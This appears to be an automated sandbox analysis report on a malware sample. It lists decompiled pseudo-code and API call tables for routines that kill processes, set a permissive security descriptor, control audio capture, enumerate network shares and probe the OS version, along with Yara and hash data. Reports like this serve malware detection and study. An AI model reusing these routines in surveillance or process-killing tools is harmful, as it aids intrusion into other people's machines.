                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec5a82
                                                                                    0x04ec5a93
                                                                                    0x04ec5aa8
                                                                                    0x04ec5ab4
                                                                                    0x04ec5abc
                                                                                    0x04ec5ad5
                                                                                    0x04ec5add
                                                                                    0x04ec5ae3
                                                                                    0x04ec5ae9
                                                                                    0x04ec5af2
                                                                                    0x04ec5afb
                                                                                    0x04ec5b00
                                                                                    0x04ec5b03
                                                                                    0x04ec5b09
                                                                                    0x04ec5b18
                                                                                    0x04ec5b18
                                                                                    0x04ec5b1b
                                                                                    0x04ec5b21
                                                                                    0x04ec5b26
                                                                                    0x04ec5b30
                                                                                    0x04ec5b30
                                                                                    0x04ec5b33
                                                                                    0x04ec5b36
                                                                                    0x04ec5b3b
                                                                                    0x04ec5b30
                                                                                    0x04ec5b40
                                                                                    0x04ec5b45
                                                                                    0x04ec5b4f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec5b55
                                                                                    0x04ec5b55
                                                                                    0x04ec5b62
                                                                                    0x04ec5b6a
                                                                                    0x04ec5bfc
                                                                                    0x04ec5b6c
                                                                                    0x04ec5b81
                                                                                    0x04ec5b83
                                                                                    0x04ec5b8a
                                                                                    0x04ec5b8c
                                                                                    0x04ec5b92
                                                                                    0x04ec5b98
                                                                                    0x04ec5b9e
                                                                                    0x04ec5ba0
                                                                                    0x04ec5ba9
                                                                                    0x04ec5bab
                                                                                    0x04ec5bae
                                                                                    0x04ec5bc0
                                                                                    0x04ec5bc3
                                                                                    0x04ec5bd3
                                                                                    0x04ec5bd3
                                                                                    0x04ec5bc3
                                                                                    0x04ec5bd6
                                                                                    0x04ec5bea
                                                                                    0x04ec5bea
                                                                                    0x04ec5b6a

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,00000000), ref: 04EC5A47
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC5A4A
                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04EC5A96
                                                                                    • GetVersionExW.KERNEL32(0000011C,?,?,?,?,?,00000000), ref: 04EC5ACD
                                                                                    • GetSystemMetrics.USER32 ref: 04EC5B12
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers,?,?,?,?,?,00000000), ref: 04EC5B5F
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC5B62
                                                                                    • GetSystemMetrics.USER32 ref: 04EC5BCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadMetricsProcSystem$CurrentProcessVersion
                                                                                    • String ID: GetNativeSystemInfo$RtlGetNtVersionNumbers$kernel32.dll$ntdll.dll
                                                                                    • API String ID: 3805471242-3094728150
                                                                                    • Opcode ID: 190265bd55cd54b491687b332184a23f27740a1178214b41ea9faf0cea11e0e6
                                                                                    • Instruction ID: bab2051c2a2dbec26fcc36bad559b31c46c820d501992087866889b61b2319c2
                                                                                    • Opcode Fuzzy Hash: 190265bd55cd54b491687b332184a23f27740a1178214b41ea9faf0cea11e0e6
                                                                                    • Instruction Fuzzy Hash: 19517030A00229DBDB34DF65CE45BEABBF4EF48305F14559ED88A97640EA74BA85CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBDD10, Relevance: 21.1, APIs: 14, Instructions: 124memorysleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 56%
                                                                                    			E04EBDD10(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				void* _t20;
				int _t25;
				int _t32;
				void* _t40;
				void* _t42;
				void* _t44;
				void* _t49;
				void* _t53;
				void* _t57;
				intOrPtr _t64;
				void* _t67;
				void* _t71;
				void* _t74;

				_push(__ecx);
				_t40 = _a8;
				_t64 = __ecx;
				_t57 = 0;
				_v8 = __ecx;
				if(_t40 != 0) {
					do {
						_t74 = OpenProcess(0x1fffff, 0,  *(_t57 + _a4));
						TerminateProcess(_t74, 0);
						CloseHandle(_t74);
						_t57 = _t57 + 4;
					} while (_t57 < _t40);
					_t64 = _v8;
				}
				Sleep(0x64);
				_t19 =  *((intOrPtr*)(_t64 + 0xc));
				if(_t19 != 2) {
					__eflags = _t19 - 3;
					if(__eflags != 0) {
						_t20 = E04EBDB70(_t64, __eflags);
						goto L10;
					} else {
						_t20 = E04EBD960(_t57, _t64);
						_a8 = _t20;
						__eflags = _t20;
						if(_t20 == 0) {
							goto L10;
						} else {
							_t14 = LocalSize(_t20) + 1; // 0x1
							_t42 = LocalAlloc(0x40, _t14);
							_t67 = _a8;
							_t16 = _t42 + 1; // 0x1
							_t49 = _t16;
							 *_t42 = 0x8e;
							E04EDDC90(_t49, _t67, _t21);
							LocalFree(_t67);
							_t25 = LocalSize(_t42);
							_push(_t49);
							_push(0x3f);
							_push(_t25);
							_push(_t42);
							E04EB1C60( *((intOrPtr*)(_v8 + 4)));
							return LocalFree(_t42);
						}
					}
				} else {
					_t20 = E04EBD550(_t57, _t64);
					_a8 = _t20;
					if(_t20 == 0) {
						L10:
						return _t20;
					} else {
						_t8 = LocalSize(_t20) + 1; // 0x1
						_t44 = LocalAlloc(0x40, _t8);
						_t71 = _a8;
						_t10 = _t44 + 1; // 0x1
						_t53 = _t10;
						 *_t44 = 0x8e;
						E04EDDC90(_t53, _t71, _t28);
						LocalFree(_t71);
						_t32 = LocalSize(_t44);
						_push(_t53);
						_push(0x3f);
						_push(_t32);
						_push(_t44);
						E04EB1C60( *((intOrPtr*)(_v8 + 4)));
						return LocalFree(_t44);
					}
				}
			}




















                                                                                    0x04ebdd13
                                                                                    0x04ebdd15
                                                                                    0x04ebdd1a
                                                                                    0x04ebdd1c
                                                                                    0x04ebdd1e
                                                                                    0x04ebdd23
                                                                                    0x04ebdd25
                                                                                    0x04ebdd38
                                                                                    0x04ebdd3d
                                                                                    0x04ebdd44
                                                                                    0x04ebdd4a
                                                                                    0x04ebdd4d
                                                                                    0x04ebdd51
                                                                                    0x04ebdd51
                                                                                    0x04ebdd56
                                                                                    0x04ebdd5c
                                                                                    0x04ebdd62
                                                                                    0x04ebddc9
                                                                                    0x04ebddcc
                                                                                    0x04ebde31
                                                                                    0x00000000
                                                                                    0x04ebddce
                                                                                    0x04ebddce
                                                                                    0x04ebddd3
                                                                                    0x04ebddd6
                                                                                    0x04ebddd8
                                                                                    0x00000000
                                                                                    0x04ebddda
                                                                                    0x04ebdde5
                                                                                    0x04ebddf1
                                                                                    0x04ebddf4
                                                                                    0x04ebddf8
                                                                                    0x04ebddf8
                                                                                    0x04ebddfb
                                                                                    0x04ebddff
                                                                                    0x04ebde0e
                                                                                    0x04ebde11
                                                                                    0x04ebde13
                                                                                    0x04ebde17
                                                                                    0x04ebde19
                                                                                    0x04ebde1a
                                                                                    0x04ebde1e
                                                                                    0x04ebde2c
                                                                                    0x04ebde2c
                                                                                    0x04ebddd8
                                                                                    0x04ebdd64
                                                                                    0x04ebdd64
                                                                                    0x04ebdd69
                                                                                    0x04ebdd6e
                                                                                    0x04ebde36
                                                                                    0x04ebde3c
                                                                                    0x04ebdd74
                                                                                    0x04ebdd7f
                                                                                    0x04ebdd8b
                                                                                    0x04ebdd8e
                                                                                    0x04ebdd92
                                                                                    0x04ebdd92
                                                                                    0x04ebdd95
                                                                                    0x04ebdd99
                                                                                    0x04ebdda8
                                                                                    0x04ebddab
                                                                                    0x04ebddad
                                                                                    0x04ebddb1
                                                                                    0x04ebddb3
                                                                                    0x04ebddb4
                                                                                    0x04ebddb8
                                                                                    0x04ebddc6
                                                                                    0x04ebddc6
                                                                                    0x04ebdd6e

                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD32
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD3D
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD44
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD56
                                                                                    • LocalSize.KERNEL32 ref: 04EBDD7B
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD85
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDDA8
                                                                                    • LocalSize.KERNEL32 ref: 04EBDDAB
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDDBE
                                                                                    • LocalSize.KERNEL32 ref: 04EBDDE1
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDDEB
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDE0E
                                                                                    • LocalSize.KERNEL32 ref: 04EBDE11
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDE24
                                                                                      • Part of subcall function 04EBDB70: LocalAlloc.KERNEL32(00000040,74E45A91,00000000,?,?), ref: 04EBDBBE
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBE0
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBFE
                                                                                      • Part of subcall function 04EBDB70: LocalSize.KERNEL32 ref: 04EBDC05
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 04EBDC1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Free$Size$Alloc$Process$CloseHandleOpenSleepTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 363554170-0
                                                                                    • Opcode ID: 4e955817db98afe358ed406a22ea1e7196b91463e3e1ff62148e69461611c89d
                                                                                    • Instruction ID: e40eea0479ad94770b888cc90c3d0c4c15040733af3fcbed8a61a6a00fd75a5c
                                                                                    • Opcode Fuzzy Hash: 4e955817db98afe358ed406a22ea1e7196b91463e3e1ff62148e69461611c89d
                                                                                    • Instruction Fuzzy Hash: 44310B76A01214ABD710EBA5DC40DABB7ADEF89321B044255FE59D7140DE75BD00CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBAE50, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 102memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E04EBAE50(void* __ebx, void* __edi, void* __esi, struct _SECURITY_DESCRIPTOR* _a4) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				struct _SECURITY_DESCRIPTOR* _v24;
				signed int _t16;
				struct _SECURITY_DESCRIPTOR* _t18;
				void* _t20;
				long _t38;
				long _t46;
				void* _t48;
				signed int _t49;

				_t16 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t16 ^ _t49;
				_t18 = _a4;
				_t48 = 0;
				_v24 = _t18;
				_v20 = 0;
				_t46 = 0;
				_v16.Value = 0;
				_v12 = 0x100;
				if(InitializeSecurityDescriptor(_t18, 1) != 0 && AllocateAndInitializeSid( &_v16, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
					_t10 = GetLengthSid(_v20) + 0x10; // 0x10
					_t38 = _t10;
					_t48 = HeapAlloc(GetProcessHeap(), 8, _t38);
					if(_t48 != 0 && InitializeAcl(_t48, _t38, 2) != 0 && AddAccessAllowedAce(_t48, 2, 0x10000000, _v20) != 0) {
						SetSecurityDescriptorDacl(_v24, 1, _t48, 0);
						_t46 =  !=  ? 1 : 0;
					}
				}
				_t20 = _v20;
				if(_t20 != 0) {
					FreeSid(_t20);
				}
				if(_t46 != 0) {
					return E04ED572E(_v8 ^ _t49);
				} else {
					if(_t48 != 0) {
						HeapFree(GetProcessHeap(), _t46, _t48);
					}
					return E04ED572E(_v8 ^ _t49);
				}
			}















                                                                                    0x04ebae56
                                                                                    0x04ebae5d
                                                                                    0x04ebae60
                                                                                    0x04ebae67
                                                                                    0x04ebae69
                                                                                    0x04ebae6d
                                                                                    0x04ebae74
                                                                                    0x04ebae76
                                                                                    0x04ebae79
                                                                                    0x04ebae87
                                                                                    0x04ebaeaf
                                                                                    0x04ebaeaf
                                                                                    0x04ebaec2
                                                                                    0x04ebaec6
                                                                                    0x04ebaef2
                                                                                    0x04ebaeff
                                                                                    0x04ebaeff
                                                                                    0x04ebaf02
                                                                                    0x04ebaf03
                                                                                    0x04ebaf08
                                                                                    0x04ebaf0b
                                                                                    0x04ebaf0b
                                                                                    0x04ebaf13
                                                                                    0x04ebaf4d
                                                                                    0x04ebaf15
                                                                                    0x04ebaf17
                                                                                    0x04ebaf22
                                                                                    0x04ebaf22
                                                                                    0x04ebaf39
                                                                                    0x04ebaf39

                                                                                    APIs
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(04EBB5ED,00000001,74E5F560,74E06490), ref: 04EBAE7F
                                                                                    • AllocateAndInitializeSid.ADVAPI32(04EBB56F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EBAE9B
                                                                                    • GetLengthSid.ADVAPI32(00000000,74E06620), ref: 04EBAEA9
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 04EBAEB5
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 04EBAEBC
                                                                                    • InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 04EBAECC
                                                                                    • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 04EBAEE1
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04EBAEF2
                                                                                    • FreeSid.ADVAPI32(00000000), ref: 04EBAF0B
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04EBAF1B
                                                                                    • HeapFree.KERNEL32(00000000), ref: 04EBAF22
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$Initialize$DescriptorFreeProcessSecurity$AccessAllocAllocateAllowedDaclLength
                                                                                    • String ID: ft
                                                                                    • API String ID: 1313825231-3858869227
                                                                                    • Opcode ID: a336b49abe5b1383db2307eaa75e9120ec288ebead4a93737e176b2aa25d0342
                                                                                    • Instruction ID: 3ec324321a346daae7fbb629fcf630ad6f140b399c27e97e7aad5f8f4154a5b6
                                                                                    • Opcode Fuzzy Hash: a336b49abe5b1383db2307eaa75e9120ec288ebead4a93737e176b2aa25d0342
                                                                                    • Instruction Fuzzy Hash: 1C312F71A01219ABDB20DFA69C49FEFBBBCEF84746F00412ABD05D2144DB749D00C7A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB1280, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 68threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E04EB1280(intOrPtr* __ecx) {
				void* _t38;
				void* _t39;
				void* _t40;
				intOrPtr* _t42;
				intOrPtr* _t43;
				struct wavehdr_tag** _t45;
				struct wavehdr_tag** _t46;
				void* _t47;

				_t42 = __ecx;
				 *__ecx = 0x4efb5cc;
				if( *((char*)(__ecx + 0x44)) != 0) {
					waveInStop( *(__ecx + 0x18));
					waveInReset( *(__ecx + 0x18));
					_t46 = __ecx + 0x30;
					_t40 = 2;
					do {
						waveInUnprepareHeader( *(__ecx + 0x18),  *_t46, 0x20);
						_t46 =  &(_t46[1]);
						_t40 = _t40 - 1;
					} while (_t40 != 0);
					waveInClose( *(__ecx + 0x18));
					TerminateThread( *(__ecx + 0x2c), 0xffffffff);
				}
				if( *((char*)(_t42 + 0x45)) != 0) {
					waveOutReset( *(_t42 + 0x40));
					_t45 = _t42 + 0x30;
					_t39 = 2;
					do {
						waveOutUnprepareHeader( *(_t42 + 0x40),  *_t45, 0x20);
						_t45 =  &(_t45[1]);
						_t39 = _t39 - 1;
					} while (_t39 != 0);
					waveOutClose( *(_t42 + 0x40));
				}
				_t43 = _t42 + 0x30;
				_t38 = 2;
				do {
					E04ED573F( *((intOrPtr*)(_t43 - 0x28)));
					_push(0x20);
					E04ED5777( *_t43);
					E04ED573F( *((intOrPtr*)(_t43 - 0x20)));
					_push(0x20);
					E04ED5777( *((intOrPtr*)(_t43 + 8)));
					_t47 = _t47 + 0x18;
					_t43 = _t43 + 4;
					_t38 = _t38 - 1;
				} while (_t38 != 0);
				CloseHandle( *(_t42 + 0x24));
				CloseHandle( *(_t42 + 0x28));
				return CloseHandle( *(_t42 + 0x2c));
			}











                                                                                    0x04eb1283
                                                                                    0x04eb1289
                                                                                    0x04eb128f
                                                                                    0x04eb1294
                                                                                    0x04eb129d
                                                                                    0x04eb12a3
                                                                                    0x04eb12a6
                                                                                    0x04eb12b0
                                                                                    0x04eb12b7
                                                                                    0x04eb12bd
                                                                                    0x04eb12c0
                                                                                    0x04eb12c0
                                                                                    0x04eb12c8
                                                                                    0x04eb12d3
                                                                                    0x04eb12d3
                                                                                    0x04eb12dd
                                                                                    0x04eb12e2
                                                                                    0x04eb12e8
                                                                                    0x04eb12eb
                                                                                    0x04eb12f0
                                                                                    0x04eb12f7
                                                                                    0x04eb12fd
                                                                                    0x04eb1300
                                                                                    0x04eb1300
                                                                                    0x04eb1308
                                                                                    0x04eb1308
                                                                                    0x04eb130e
                                                                                    0x04eb1311
                                                                                    0x04eb1316
                                                                                    0x04eb1319
                                                                                    0x04eb131e
                                                                                    0x04eb1322
                                                                                    0x04eb132a
                                                                                    0x04eb132f
                                                                                    0x04eb1334
                                                                                    0x04eb1339
                                                                                    0x04eb133c
                                                                                    0x04eb133f
                                                                                    0x04eb133f
                                                                                    0x04eb134d
                                                                                    0x04eb1352
                                                                                    0x04eb135c

                                                                                    APIs
                                                                                    • waveInStop.WINMM(?), ref: 04EB1294
                                                                                    • waveInReset.WINMM(?), ref: 04EB129D
                                                                                    • waveInUnprepareHeader.WINMM(?,?,00000020), ref: 04EB12B7
                                                                                    • waveInClose.WINMM(?), ref: 04EB12C8
                                                                                    • TerminateThread.KERNEL32(?,000000FF), ref: 04EB12D3
                                                                                    • waveOutReset.WINMM(?), ref: 04EB12E2
                                                                                    • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 04EB12F7
                                                                                    • waveOutClose.WINMM(?), ref: 04EB1308
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB134D
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB1352
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB1357
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wave$Close$Handle$HeaderResetUnprepare$StopTerminateThread
                                                                                    • String ID: 0et
                                                                                    • API String ID: 1104916709-2725761952
                                                                                    • Opcode ID: 0ff11c5e38e063bddc7761ad418632b35cd44cf04dfd2e32dd7f938d3cd0178b
                                                                                    • Instruction ID: a435e4697241379cd3533709f8b51ece9fb9fabcf0c08b09fbd2ce482d063d26
                                                                                    • Opcode Fuzzy Hash: 0ff11c5e38e063bddc7761ad418632b35cd44cf04dfd2e32dd7f938d3cd0178b
                                                                                    • Instruction Fuzzy Hash: 46211671900612BFEB215F21DD08A59BF72FF48365F100124EA45629A5CB26B866DFC0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB47A0, Relevance: 19.6, APIs: 13, Instructions: 128memoryshareCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EB47A0() {
				void* _v8;
				int _v12;
				void* _v16;
				int _v20;
				int _v24;
				void* _v28;
				void* _t35;
				int _t38;
				int _t45;
				signed int* _t48;
				signed int _t49;
				int _t51;
				long _t57;
				signed int _t59;
				WCHAR* _t60;
				void* _t62;
				WCHAR** _t66;
				void* _t70;

				_v20 = 0x4000;
				_t57 = 0;
				_v12 = 0xffffffff;
				_v16 = 0;
				if(WNetOpenEnumW(1, 1, 0, 0,  &_v16) == 0) {
					_v8 = LocalAlloc(0x40, 0x400);
					_t35 = LocalAlloc(0x40, _v20);
					_t62 = _t35;
					_v28 = _t62;
					if(_t62 != 0) {
						_t70 = _v8;
						while(1) {
							_t38 = WNetEnumResourceW(_v16,  &_v12, _t62,  &_v20);
							if(_t38 != 0) {
								break;
							}
							_v24 = _t38;
							if(_v12 > _t38) {
								_t66 = _t62 + 0x14;
								do {
									_t45 = lstrlenW( *_t66);
									if(_t57 + (_t45 + 1) * 2 <= LocalSize(_v8)) {
										_t70 = _v8;
									} else {
										_t70 = LocalReAlloc(_v8, _t57 + (lstrlenW( *_t66) + 1) * 2, 0x42);
										_v8 = _t70;
									}
									_t60 =  *_t66;
									_t48 = _t70 + _t57;
									do {
										_t59 =  *_t60 & 0x0000ffff;
										_t60 =  &(_t60[1]);
										 *_t48 = _t59;
										_t48 =  &(_t48[0]);
									} while (_t59 != 0);
									_t49 = lstrlenW( *_t66);
									_t66 =  &(_t66[8]);
									_t51 = _v24 + 1;
									_t57 = _t57 + _t49 * 2 + 2;
									_v24 = _t51;
								} while (_t51 < _v12);
								_t62 = _v28;
							}
						}
						LocalFree(_t62);
						WNetCloseEnum(_v16);
						if(_t70 == 0) {
							L19:
							return _t70;
						} else {
							if(_t57 >= 1) {
								_t70 = LocalReAlloc(_t70, _t57, 0x42);
								goto L19;
							} else {
								LocalFree(_t70);
								return 0;
							}
						}
					} else {
						return _t35;
					}
				} else {
					return 0;
				}
			}





















                                                                                    0x04eb47aa
                                                                                    0x04eb47b2
                                                                                    0x04eb47b4
                                                                                    0x04eb47c1
                                                                                    0x04eb47cc
                                                                                    0x04eb47e9
                                                                                    0x04eb47ee
                                                                                    0x04eb47f0
                                                                                    0x04eb47f2
                                                                                    0x04eb47f7
                                                                                    0x04eb4800
                                                                                    0x04eb4803
                                                                                    0x04eb480f
                                                                                    0x04eb4817
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb481d
                                                                                    0x04eb4823
                                                                                    0x04eb4825
                                                                                    0x04eb4828
                                                                                    0x04eb482a
                                                                                    0x04eb483f
                                                                                    0x04eb4860
                                                                                    0x04eb4841
                                                                                    0x04eb4859
                                                                                    0x04eb485b
                                                                                    0x04eb485b
                                                                                    0x04eb4863
                                                                                    0x04eb4865
                                                                                    0x04eb4870
                                                                                    0x04eb4870
                                                                                    0x04eb4873
                                                                                    0x04eb4876
                                                                                    0x04eb4879
                                                                                    0x04eb487c
                                                                                    0x04eb4883
                                                                                    0x04eb4889
                                                                                    0x04eb4892
                                                                                    0x04eb4893
                                                                                    0x04eb4896
                                                                                    0x04eb4899
                                                                                    0x04eb489e
                                                                                    0x04eb489e
                                                                                    0x04eb4823
                                                                                    0x04eb48ad
                                                                                    0x04eb48b2
                                                                                    0x04eb48ba
                                                                                    0x04eb48db
                                                                                    0x04eb48e3
                                                                                    0x04eb48bc
                                                                                    0x04eb48bf
                                                                                    0x04eb48d9
                                                                                    0x00000000
                                                                                    0x04eb48c1
                                                                                    0x04eb48c2
                                                                                    0x04eb48ce
                                                                                    0x04eb48ce
                                                                                    0x04eb48bf
                                                                                    0x04eb47f9
                                                                                    0x04eb47ff
                                                                                    0x04eb47ff
                                                                                    0x04eb47ce
                                                                                    0x04eb47d4
                                                                                    0x04eb47d4

                                                                                    APIs
                                                                                    • WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 04EB47C4
                                                                                    • LocalAlloc.KERNEL32(00000040,00000400,74E069A0,?), ref: 04EB47E4
                                                                                    • LocalAlloc.KERNEL32(00000040,00004000), ref: 04EB47EE
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocLocal$EnumOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2229625058-0
                                                                                    • Opcode ID: 06757e93395d85a8e44bb83b4ad9d315b08804bfb1a9245822cd199434bd760e
                                                                                    • Instruction ID: ca81ef2310de6f6fb489bd7f6b5bd58c65f9cce5d1028a926b1a4296a5b880bd
                                                                                    • Opcode Fuzzy Hash: 06757e93395d85a8e44bb83b4ad9d315b08804bfb1a9245822cd199434bd760e
                                                                                    • Instruction Fuzzy Hash: B441AE72A01119ABCB11DFA9E884AEEFBB8FF84715F1101A6F954E3255DB316E108B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EEB98F, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EEB98F(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x4f036f0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E04EE8159(_t46);
							E04EEBCA3( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E04EE8159(_t47);
							E04EEBDA1( *((intOrPtr*)(_t74 + 0x88)));
						}
						E04EE8159( *((intOrPtr*)(_t74 + 0x7c)));
						E04EE8159( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E04EE8159( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E04EE8159( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E04EE8159( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E04EE8159( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E04EEBB02( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa1
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x29
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x4f03100) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E04EE8159(_t31);
							E04EE8159( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E04EE8159(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E04EE8159(_t74);
			}















                                                                                    0x04eeb997
                                                                                    0x04eeb99b
                                                                                    0x04eeb9a3
                                                                                    0x04eeb9ac
                                                                                    0x04eeb9b1
                                                                                    0x04eeb9b8
                                                                                    0x04eeb9c0
                                                                                    0x04eeb9c8
                                                                                    0x04eeb9d3
                                                                                    0x04eeb9d9
                                                                                    0x04eeb9da
                                                                                    0x04eeb9e2
                                                                                    0x04eeb9ea
                                                                                    0x04eeb9f5
                                                                                    0x04eeb9fb
                                                                                    0x04eeb9ff
                                                                                    0x04eeba0a
                                                                                    0x04eeba10
                                                                                    0x04eeb9b1
                                                                                    0x04eeba11
                                                                                    0x04eeba19
                                                                                    0x04eeba2c
                                                                                    0x04eeba3f
                                                                                    0x04eeba4d
                                                                                    0x04eeba58
                                                                                    0x04eeba5d
                                                                                    0x04eeba66
                                                                                    0x04eeba6e
                                                                                    0x04eeba6f
                                                                                    0x04eeba6f
                                                                                    0x04eeba75
                                                                                    0x04eeba78
                                                                                    0x04eeba78
                                                                                    0x04eeba7b
                                                                                    0x04eeba82
                                                                                    0x04eeba84
                                                                                    0x04eeba88
                                                                                    0x04eeba90
                                                                                    0x04eeba97
                                                                                    0x04eeba9d
                                                                                    0x04eeba9e
                                                                                    0x04eeba9e
                                                                                    0x04eebaa5
                                                                                    0x04eebaa7
                                                                                    0x04eebaac
                                                                                    0x04eebab4
                                                                                    0x04eebab9
                                                                                    0x04eebaba
                                                                                    0x04eebaba
                                                                                    0x04eebabd
                                                                                    0x04eebac0
                                                                                    0x04eebac3
                                                                                    0x04eebac6
                                                                                    0x04eebac6
                                                                                    0x04eebad8

                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 04EEB9D3
